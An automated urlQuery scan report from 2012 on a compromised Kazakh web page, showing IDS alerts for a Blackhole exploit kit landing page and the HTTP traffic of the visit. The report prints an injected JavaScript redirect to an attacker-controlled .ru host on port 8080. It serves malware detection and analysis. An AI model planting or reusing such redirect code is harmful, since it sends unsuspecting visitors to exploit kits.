Overview

URL: http://www.uralcar.kz/forwarding.htm
IP: 92.46.52.73
ASN: AS9198 JSC Kazakhtelecom
Location: Kazakhstan
Report completed: 2012-11-10 02:46:36 CET
urlQuery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (none)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro: No alerts detected
Snort /w Sourcefire VRT: 2 alerts

Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-10 02:46:02 | 92.46.52.73 | urlQuery Client | 1 | EXPLOIT-KIT Blackholev2 landing page download attempt
2012-11-10 02:46:02 | 92.46.52.73 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page download attempt


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 92.46.52.73

Date | Alerts / IDS | URL | IP
2012-12-15 04:44:39 | 0 / 2 | http://fnt.kz/mail.htm | 92.46.52.73
2012-12-12 17:32:39 | 0 / 3 | http://fnt.kz/mail.htm | 92.46.52.73
2012-12-10 03:07:34 | 1 / 4 | http://import.e-vesti.kz/page4.htm | 92.46.52.73
2012-11-17 10:33:27 | 0 / 2 | http://atest.kz/page8.htm | 92.46.52.73
2012-11-17 05:24:20 | 0 / 2 | http://atest.kz/page8.htm | 92.46.52.73
2012-11-16 08:07:27 | 0 / 2 | http://uralcar.kz/forwarding.htm | 92.46.52.73

Last 6 reports on ASN: AS9198 JSC Kazakhtelecom

Date | Alerts / IDS | URL | IP
2013-03-24 13:50:34 | 1 / 1 | http://forum.profinance.kz/rating.htm | 95.57.119.115
2013-03-24 10:12:42 | 2 / 3 | http://edu.shygysdaryny.kz/ | 92.46.52.62
2013-03-24 05:16:38 | 0 / 3 | http://rashid.idhost.kz/ | 92.46.52.76
2013-03-23 22:19:40 | 1 / 1 | http://forum.profinance.kz/rating.htm | 95.57.119.115
2013-03-23 14:52:01 | 2 / 3 | http://edu.shygysdaryny.kz/index.php?cal_m=5 | 92.46.52.62
2013-03-23 14:10:13 | 2 / 3 | http://edu.shygysdaryny.kz/index.php?cal_m=7 | 92.46.52.62



JavaScript

Executed Scripts (1)


Executed Evals (1)

#1 JavaScript::Eval (size: 112, repeated: 1)

var1 = 49;
var2 = var1;
if (var1 == var2) {
    document.location = "http://canadianpanakota.ru:8080/forum/links/column.php";
}

Executed Writes (0)



HTTP Transactions (6)


Transaction #1

Request
GET /forwarding.htm HTTP/1.1
Host: www.uralcar.kz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response
HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 10 Nov 2012 01:46:02 GMT
Server: Apache/2.0.52 (Red Hat) PHP/5.2.17 FrontPage/5.0.2.2635
Last-Modified: Sat, 10 Nov 2012 01:44:19 GMT
Etag: "30218d6-509-34e902c0"
Accept-Ranges: bytes
Content-Length: 1289
Cache-Control: max-age=1209600
Expires: Sat, 24 Nov 2012 01:46:02 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive


Transaction #2

Request
GET /favicon.ico HTTP/1.1
Host: www.uralcar.kz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 10 Nov 2012 01:46:03 GMT
Server: Apache/2.0.52 (Red Hat) PHP/5.2.17 FrontPage/5.0.2.2635
Content-Length: 45
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive


Transaction #3

Request
GET /forum/links/column.php HTTP/1.1
Host: canadianpanakota.ru:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.uralcar.kz/forwarding.htm

Response
HTTP/1.1 502 Bad Gateway
Content-Type: text/html; charset=CP-1251
Server: nginx/1.0.10
Date: Sat, 10 Nov 2012 10:08:15 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20


Transaction #4

Request
GET /favicon.ico HTTP/1.1
Host: canadianpanakota.ru:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: nginx/1.0.10
Date: Sat, 10 Nov 2012 10:08:16 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244


Transaction #5

Request
GET /favicon.ico HTTP/1.1
Host: www.uralcar.kz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 10 Nov 2012 01:46:06 GMT
Server: Apache/2.0.52 (Red Hat) PHP/5.2.17 FrontPage/5.0.2.2635
Content-Length: 45
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive


Transaction #6

Request
GET /favicon.ico HTTP/1.1
Host: canadianpanakota.ru:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: nginx/1.0.10
Date: Sat, 10 Nov 2012 10:08:17 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244